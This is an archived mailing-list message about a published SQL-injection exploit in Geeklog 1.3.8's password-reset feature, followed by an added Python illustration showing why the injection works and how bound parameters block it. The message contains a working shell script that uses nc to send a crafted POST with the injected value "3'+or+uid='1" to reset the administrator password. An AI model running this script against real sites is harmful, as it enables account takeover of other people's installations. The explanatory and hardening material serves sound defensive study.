Message-ID: <BBB8A153.1792%thomas@outcast-media.com>
From: thomas at outcast-media.com (Thomas Rogg)
Subject: Geeklog exploit

On 19.10.2003 at 18:21, Jouko Pynnonen wrote from jouko@....fi:


> ...
> The exploit uses the "forgot password" feature introduced in Geeklog
> 1.3.8. By constructing a certain kind of HTTP request, an attacker can
> change any user's Geeklog password, including the administrator
> password. This is because of an SQL injection problem. In users.php we have
> this kind of code (line about 750):
> ...

I tried out your exploit on a v1.3.8 Geeklog of mine, but the returned HTML
says: "Your request for a new password has expired. Please try again below."

Am I missing something? All I changed was to use HTTP/1.1 and to use
parameters for host and path:

-----
#!/bin/sh

echo "POST $2users.php HTTP/1.1
Host: $1
Connection: close
Content-length: 50
Content-type: application/x-www-form-urlencoded

mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&
" | nc $1 80
-----

Thank you,

Thomas
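Added illustration, not code from Geeklog or from either message: a constructed stand-in for the users.php lookup Jouko describes, showing why the URL-decoded rid value from the script above ("3' or uid='1") satisfies a string-built query and why the same request fails against a parameterised one. The table, the column names (uid, passwd, pwrequestid) and the row contents are assumptions.

```python
import sqlite3

# Constructed in-memory stand-in for a Geeklog-style users table. Column
# names and rows are assumptions, not Geeklog's real schema or data.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uid INTEGER PRIMARY KEY, username TEXT, "
               "passwd TEXT, pwrequestid TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "Anonymous", "", None),
        (2, "Admin", "admin-hash", None),   # Admin never asked for a reset
        (3, "alice", "alice-hash", "r1"),   # alice has a pending reset id
    ])
    return db

def setnewpwd_vulnerable(db, uid, rid, new_pw):
    """Hypothetical string-built lookup in the style the advisory describes.
    With rid = "3' or uid='1" the WHERE clause reads
        uid = '2' AND pwrequestid = '3' or uid='1'
    and because AND binds tighter than OR, the Anonymous row (uid 1)
    satisfies it, so the check passes and uid 2's password is replaced."""
    sql = (f"SELECT uid FROM users WHERE uid = '{uid}' "
           f"AND pwrequestid = '{rid}'")
    if db.execute(sql).fetchone() is None:
        return False
    db.execute(f"UPDATE users SET passwd = '{new_pw}', pwrequestid = NULL "
               f"WHERE uid = '{uid}'")
    return True

def setnewpwd_hardened(db, uid, rid, new_pw):
    """Bound parameters: the quote inside rid is data, never SQL, and the
    password is changed only for the uid whose reset id actually matched."""
    row = db.execute("SELECT uid FROM users WHERE uid = ? AND pwrequestid = ?",
                     (uid, rid)).fetchone()
    if row is None:
        return False
    db.execute("UPDATE users SET passwd = ?, pwrequestid = NULL WHERE uid = ?",
               (new_pw, row[0]))
    return True

def admin_password(db):
    return db.execute("SELECT passwd FROM users WHERE uid = 2").fetchone()[0]

PAYLOAD_RID = "3' or uid='1"   # rid from the script above, URL-decoded

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", setnewpwd_vulnerable(db, "2", PAYLOAD_RID, "new"),
          admin_password(db))                      # True new
    db = make_db()
    print("hardened:", setnewpwd_hardened(db, "2", PAYLOAD_RID, "new"),
          admin_password(db))                      # False admin-hash
```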

